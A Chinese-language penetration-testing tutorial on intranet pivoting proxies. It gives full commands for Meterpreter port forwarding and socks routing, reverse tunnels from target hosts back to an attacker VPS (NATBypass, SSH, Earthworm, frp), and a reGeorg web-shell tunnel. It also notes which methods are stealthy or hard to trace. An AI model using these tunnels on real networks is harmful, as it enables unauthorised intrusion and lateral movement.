浅谈内网渗透代理
字数 880 2025-08-20 18:16:55

内网渗透代理技术详解

1. Meterpreter代理技术

1.1 portfwd端口转发

portfwd用于转发单个端口,适合目标明确的情况(如只需访问目标的3389端口)。

基本命令:

meterpreter > portfwd add -l 7003 -p 3389 -r 192.168.52.138
# -l: 服务器监听端口
# -p: 内网主机需转发端口
# -r: 目标内网主机IP

meterpreter > portfwd delete -l 3389 -p 3389 -r 172.16.194.191
# 删除转发

meterpreter > portfwd list
# 列出当前转发端口

meterpreter > portfwd flush
# 移除所有转发端口

1.2 socks代理

设置流程:

  1. 添加路由:
meterpreter > run get_local_subnets
meterpreter > run autoroute -s 192.168.21.0/24
meterpreter > run autoroute -p  # 查看路由
meterpreter > route flush  # 删除路由
  1. ARP扫描内网存活主机:
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.21.0/24
  1. 建立socks4代理:
meterpreter > background
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvhost 127.0.0.1
msf5 auxiliary(server/socks4a) > set srvport 1080
msf5 auxiliary(server/socks4a) > run
  1. 配置proxychains使用代理

socks5代理类似,但需要额外设置用户名和密码。

2. NATBypass工具

NATBypass是golang版lcx,可用于端口转发。

使用方法:

  1. 公网VPS执行:
nb -listen 1997 2017
  1. 内网主机执行:
nb -slave 127.0.0.1:3389 x.x.x.x:1997
# x.x.x.x是公网VPS的IP
  1. 本地直接访问VPS的2017端口即可连接内网3389

3. SSH隧道技术

3.1 公网主机建立SOCKS隧道

ssh -N -f -D 9070 x.x.x.x

配置proxychains或浏览器代理到127.0.0.1:9070

3.2 穿透两个内网

在目标内网主机执行:

ssh -qTfNn -R 2222:localhost:22 JumpHost

在公网主机执行:

ssh -p 2222 localhost

4. Earthworm (EW)工具

反向代理方法:

  1. 公网VPS执行:
./ew_for_linux64 -s rcsocks -l 7010 -e 7011
  1. 目标内网主机执行:
.\ew_for_Win.exe -s rssocks -d x.x.x.x -e 7011  # Windows
./ew_for_linux64 -s rssocks -d x.x.x.x -e 7011  # Linux
  1. 本地通过proxychains或浏览器设置socks5代理至VPS的7011端口

5. frp反向代理

配置方法:

  1. 公网VPS frps.ini配置:
[common]
bind_port = 7000
token = password

启动:

./frps -c ./frps.ini
  1. 内网主机frpc.ini配置:
[common]
server_addr = x.x.x.x
server_port = 7000
token = password

[socks5]
type = tcp
remote_port = 7004
plugin = socks5

启动:

./frpc -c ./frpc.ini
  1. 本地配置proxychains:
socks5 x.x.x.x 7004

6. 基于Web服务的socks5隧道

使用工具如reGeorg、reDuh、Tunna等。

reGeorg使用方法:

  1. 上传对应网站语言的脚本到目标服务器
  2. 访问确认脚本正常运行(显示"Georg says, 'All seems fine'")
  3. 本地执行:
python2 reGeorgSocksProxy.py -p 7001 -u http://url/tunnel.php
  1. 配置proxychains使用127.0.0.1:7001

关键点总结

  1. Meterpreter的portfwd适合单端口转发,socks代理适合多端口访问
  2. NATBypass和EW适合无meterpreter环境下的代理
  3. SSH隧道是最隐蔽但需要SSH访问权限的方法
  4. frp稳定但配置文件容易被溯源
  5. Web隧道适合有Web服务器权限但无其他权限的情况

根据实际环境选择合适的代理方法,考虑隐蔽性、稳定性和权限要求。

内网渗透代理技术详解 1. Meterpreter代理技术 1.1 portfwd端口转发 portfwd用于转发单个端口,适合目标明确的情况(如只需访问目标的3389端口)。 基本命令: 1.2 socks代理 设置流程: 添加路由: ARP扫描内网存活主机: 建立socks4代理: 配置proxychains使用代理 socks5代理 类似,但需要额外设置用户名和密码。 2. NATBypass工具 NATBypass是golang版lcx,可用于端口转发。 使用方法: 公网VPS执行: 内网主机执行: 本地直接访问VPS的2017端口即可连接内网3389 3. SSH隧道技术 3.1 公网主机建立SOCKS隧道 配置proxychains或浏览器代理到127.0.0.1:9070 3.2 穿透两个内网 在目标内网主机执行: 在公网主机执行: 4. Earthworm (EW)工具 反向代理方法: 公网VPS执行: 目标内网主机执行: 本地通过proxychains或浏览器设置socks5代理至VPS的7011端口 5. frp反向代理 配置方法: 公网VPS frps.ini配置: 启动: 内网主机frpc.ini配置: 启动: 本地配置proxychains: 6. 基于Web服务的socks5隧道 使用工具如reGeorg、reDuh、Tunna等。 reGeorg使用方法: 上传对应网站语言的脚本到目标服务器 访问确认脚本正常运行(显示"Georg says, 'All seems fine'") 本地执行: 配置proxychains使用127.0.0.1:7001 关键点总结 Meterpreter的portfwd适合单端口转发,socks代理适合多端口访问 NATBypass和EW适合无meterpreter环境下的代理 SSH隧道是最隐蔽但需要SSH访问权限的方法 frp稳定但配置文件容易被溯源 Web隧道适合有Web服务器权限但无其他权限的情况 根据实际环境选择合适的代理方法,考虑隐蔽性、稳定性和权限要求。